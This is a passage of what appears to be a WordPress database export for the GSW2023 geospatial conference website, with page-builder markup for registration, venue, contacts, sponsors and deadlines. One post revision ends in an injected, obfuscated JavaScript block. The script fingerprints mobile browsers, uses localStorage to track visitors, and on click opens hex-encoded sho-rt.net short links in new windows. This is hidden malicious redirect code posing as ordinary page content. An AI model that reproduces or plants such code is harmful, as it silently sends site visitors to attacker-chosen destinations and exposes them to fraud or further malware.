css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:42:20','2023-05-16 01:42:20','',3066,'https://gsw2023.com/?p=4490',0,'revision','',0),
(4491,1,'2023-05-16 01:42:46','2023-05-16 01:42:46','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201326399{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482 \" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"415\" height=\"126\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column 